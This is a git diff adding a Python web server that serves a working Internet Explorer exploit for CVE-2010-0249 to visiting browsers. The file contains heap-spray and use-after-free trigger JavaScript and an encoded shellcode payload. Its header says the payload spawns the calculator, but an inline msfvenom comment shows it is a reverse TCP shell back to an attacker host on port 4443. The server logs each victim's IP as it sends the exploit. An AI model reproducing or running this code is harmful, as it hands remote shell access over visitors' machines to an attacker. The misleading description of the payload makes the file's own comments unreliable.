ie_aurora.py

ankh2054 · web-flow · commit 1caf00b0bb01 · 2016-10-03T10:12:08.000+01:00
diff --git a/ie_aurora.py b/ie_aurora.py
@@ -0,0 +1,170 @@
+#
+#   Author : Ahmed Obied (ahmed.obied@gmail.com)
+#
+#   This program acts as a web server that generates an exploit to 
+#   target a vulnerability (CVE-2010-0249) in Internet Explorer. 
+#   The exploit was tested using Internet Explorer 6 on Windows XP SP2. 
+#   The exploit's payload spawns the calculator. 
+#
+#   Usage  : python ie_aurora.py [port number]
+#   
+ 
+import sys
+import socket
+
+from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
+        
+class RequestHandler(BaseHTTPRequestHandler):
+
+    def convert_to_utf16(self, payload):
+        enc_payload = ''
+        for i in range(0, len(payload), 2):
+            num = 0
+            for j in range(0, 2):
+                num += (ord(payload[i + j]) & 0xff) << (j * 8)
+            enc_payload += '%%u%04x' % num
+        return enc_payload
+                
+    def get_payload(self):
+  # msfvenom -p windows/shell_reverse_tcp LHOST=[IP]LPORT=4443 EXITFUNC=process -b "\x00" -f js_le    
+	payload = "%u95bf%u73e2%udbc3%ud9cf%u2474%u5ef4%uc931%u52b1%uee83%u31fc%u0e7e%ueb03%u91ec%uef36%ud719%u0fb9%ub8da%uea30%uf8eb%u7f27%uc95b%u2d2c%ua250%uc561%uc6e3%ueaad%u6c44%uc588%udd55%u44e8%u1cd6%ua63d%ueee7%ua730%u1220%uf5b8%u58f9%ue96f%u158e%u82ac%ub8dd%u77b4%ubb95%u2695%ue5ad%uc935%u9e62%ud17f%u9b67%u6a36%u5753%ubac9%u98ad%u8366%u6b01%uc476%u94a6%u3c0d%u29d5%ufb16%uf5a7%u1f93%u7d0f%ufb03%u52b1%u88d2%u1fbe%ud690%u9ea2%u6d75%u2bde%ua178%u6f56%u655f%u2b32%u3cfe%u9a9e%u5eff%u4241%u155a%u976c%u74d7%u54f9%u86da%uf2f9%uf56d%u5dcb%u91c6%u1567%u66c0%u0c87%uf8b4%uaf76%ud1c5%ufbbc%u4995%u8414%u897d%u5199%ud9d1%u0a35%u8992%ufaf5%uc37a%u25f9%uec9a%u4dd3%u1731%u7bb4%u17cd%u1474%u17d3%ubf65%uf15a%u2fef%uaa0b%ud687%u2016%u1639%u4d8d%u9c79%ub222%u5534%ua04e%u95a1%u9a05%ua964%ub2b3%u38eb%u4258%u2165%u15f7%u9722%uf30e%u8ede%ue1b8%u5622%ua182%uabf8%u280d%u908c%u3a29%u1848%u6e76%u4f04%ud820%u39e2%ub282%u96bc%u524c%ud538%u244e%u3045%uc839%uedf4%uf77c%u7a39%u8089%u1a27%u5b76%u2aec%uc13d%ua345%u9098%uaed7%u4f1a%ud71b%u6598%u2ce4%u0c80%u69e1%ufd06%ue29b%u01e3%u020f%u4126"
+
+	return payload
+    
+    def get_exploit(self):
+        exploit = '''
+        <html>
+        <head>
+            <script>
+            
+            var obj, event_obj;
+            
+            function spray_heap()
+            {
+                var chunk_size, payload, nopsled;
+            
+                chunk_size = 0x80000;
+                payload = unescape("<PAYLOAD>");
+                nopsled = unescape("<NOP>");
+                while (nopsled.length < chunk_size)
+                    nopsled += nopsled;
+                nopsled_len = chunk_size - (payload.length + 20);        
+                nopsled = nopsled.substring(0, nopsled_len);
+                heap_chunks = new Array();
+                for (var i = 0 ; i < 200 ; i++)
+                    heap_chunks[i] = nopsled + payload;
+            }
+        
+            function initialize()
+            {
+                obj = new Array();
+                event_obj = null;
+                for (var i = 0; i < 200 ; i++ )
+                    obj[i] = document.createElement("COMMENT");
+            }
+        
+            function ev1(evt)
+            {
+                event_obj = document.createEventObject(evt);
+                document.getElementById("sp1").innerHTML = "";
+                window.setInterval(ev2, 1);
+            }
+      
+            function ev2()
+            {
+                var data, tmp;
+                
+                data = "";
+                tmp = unescape("%u0a0a%u0a0a");
+                for (var i = 0 ; i < 4 ; i++)
+                    data += tmp;
+                for (i = 0 ; i < obj.length ; i++ ) {
+                    obj[i].data = data;
+                }
+                event_obj.srcElement;
+            }
+                    
+            function check()
+            
+		{
+                document.write(navigator.userAgent);
+                return true;   
+            }
+            
+            if (check()) {
+                initialize();
+                spray_heap();               
+            }
+            else
+                window.location = 'about:blank'
+                
+            </script>
+        </head>
+        <body>
+		<h2> Hello </h2>
+            <span id="sp1">
+            <img src="aurora.gif" onload="ev1(event)">
+            </span>        
+        </body>
+        </html>
+        '''
+        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
+        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
+        return exploit 
+
+    def get_image(self):
+        content  = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
+        content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
+        content += '\x01\x00\x3b'
+        return content
+
+    def log_request(self, *args, **kwargs):
+        pass
+        
+    def do_GET(self):
+        try:
+            if self.path == '/':
+                print
+                print '[-] Incoming connection from %s' % self.client_address[0]
+                self.send_response(200) 
+                self.send_header('Content-Type', 'text/html')
+                self.end_headers()
+                print '[-] Sending exploit to %s ...' % self.client_address[0]
+		self.wfile.write(self.get_exploit())
+                print '[-] Exploit sent to %s' % self.client_address[0]
+            elif self.path == '/aurora.gif':      
+                self.send_response(200)
+                self.send_header('Content-Type', 'image/gif')
+                self.end_headers()
+                self.wfile.write(self.get_image())
+        except: 
+            print '[*] Error : an error has occured while serving the HTTP request'
+            print '[-] Exiting ...'
+            sys.exit(-1)
+            
+                       
+def main():
+    if len(sys.argv) != 2:
+        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
+        sys.exit(0)
+    try:
+        port = int(sys.argv[1])
+        if port < 1024 or port > 65535:
+            raise ValueError
+        try:
+            serv = HTTPServer(('', port), RequestHandler)
+            ip = socket.gethostbyname(socket.gethostname())
+            print '[-] Web server is running at http://%s:%d/' % (ip, port)
+            try:
+                serv.serve_forever()
+            except:
+                print '[-] Exiting ...' 
+        except socket.error:
+            print '[*] Error : a socket error has occurred'
+        sys.exit(-1)    
+    except ValueError:
+        print '[*] Error : an invalid port number was given'
+        sys.exit(-1)
+            
+if __name__ == '__main__':
+    main()
